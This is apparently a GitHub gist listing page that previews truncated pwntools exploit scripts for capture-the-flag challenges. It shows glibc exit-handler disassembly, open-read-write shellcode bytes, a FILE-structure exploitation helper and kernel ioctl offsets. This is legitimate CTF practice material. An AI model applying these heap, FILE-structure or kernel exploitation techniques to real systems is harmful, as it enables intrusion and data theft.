soez soez
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Glibc 2.35 Ubuntu 22.04 | |
| When exit is called, it passes by here... (Explaining without ASLR) | |
| 0x7ffff7daa390 <__run_exit_handlers>: endbr64 | |
| 0x7ffff7daa394 <__run_exit_handlers+4>: push r15 | |
| 0x7ffff7daa396 <__run_exit_handlers+6>: push r14 | |
| 0x7ffff7daa398 <__run_exit_handlers+8>: push r13 | |
| 0x7ffff7daa39a <__run_exit_handlers+10>: push r12 | |
| 0x7ffff7daa39c <__run_exit_handlers+12>: mov r12,rsi | |
| 0x7ffff7daa39f <__run_exit_handlers+15>: push rbp |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| local = False | |
| libc = ELF("./libc.so.6", checksec = False) | |
| binary = ELF("./vuln", checksec = False) | |
| def menu(n): | |
| io.recvuntil("\nChoice: ") | |
| io.sendline(str(n)) | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import binascii | |
| # open-read-write file | |
| filename = "flag.txt" | |
| body = "\x5f" # pop rdi | |
| body += "\x80\x77" + chr(len(filename)) + "\x41" # xor byte [rdi + 11], 0x41 ; 11 = len(/etc/passwd) | |
| body += "\x48\x31\xf6" # xor rsi, rsi | |
| body += "\x48\x31\xc0" # xor rax, rax |
soez
/ pwn2win_2020_ctf_command.py
Created
May 31, 2020 16:56
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding:utf-8 -*- | |
| from pwn import * | |
| # based on https://dhavalkapil.com/blogs/FILE-Structure-Exploitation/ | |
| def pack_file(_flags = 0, | |
| _IO_read_ptr = 0, | |
| _IO_read_end = 0, | |
| _IO_read_base = 0, | |
| _IO_write_base = 0, |
soez
/ 36C3CTF-onetimepad.py
Last active
December 30, 2019 08:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding: utf-8 | |
| from pwn import * | |
| def menu(s): | |
| io.recvuntil("> ") | |
| io.sendline(s) | |
| def write(s): | |
| menu("w") | |
| io.sendline(s) |
soez
/ hack.lu_2019-kernel_baby_2.py
Created
October 24, 2019 10:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding:utf-8 -*- | |
| from pwn import * | |
| IOCTL_READ = 901 | |
| IOCTL_WRITE = 902 | |
| OFFSET_COMM = 0x408 | |
| OFFSET_TASKS = 0x210 | |
| e = ELF('./vmlinux') |
soez
/ Tokyowesterns_5th-asterisk_alloc.py
Created
September 3, 2019 16:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding:utf-8 -*- | |
| from pwn import * | |
| def menu(n): | |
| io.recvuntil("Your choice: ") | |
| io.sendline(str(n)) | |
| def malloc(sz, s): | |
| menu(1) | |
| io.recvuntil("Size: ") |
soez
/ ISITDTU CTF iz_heap_lv1.py
Created
June 30, 2019 12:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| def init(s): | |
| io.recvuntil("Input name: ") | |
| io.sendline(s) | |
| def menu(n): | |
| io.recvuntil("Choice: \n") | |
| io.sendline(str(n)) |
soez
/ ctf.bsidesdelhi - data_bank.py
Created
October 26, 2018 12:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| def menu(n): | |
| r.recvuntil(">> ") | |
| r.sendline(str(n)) | |
| def add(idx, size, payload): | |
| menu(1) | |
| r.recvuntil("Enter the index:\n") | |
| r.sendline(str(idx)) |
soez
/ nn8ed - pokedex_nn2k18.py
Last active
October 10, 2018 15:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| def menu(): | |
| r.recvuntil("option> ") | |
| def create(pos, name, height, weight, power): | |
| menu() | |
| r.sendline("1") | |
| r.recvuntil("Enter the new pokemon ID: ") | |
| r.sendline(str(pos)) |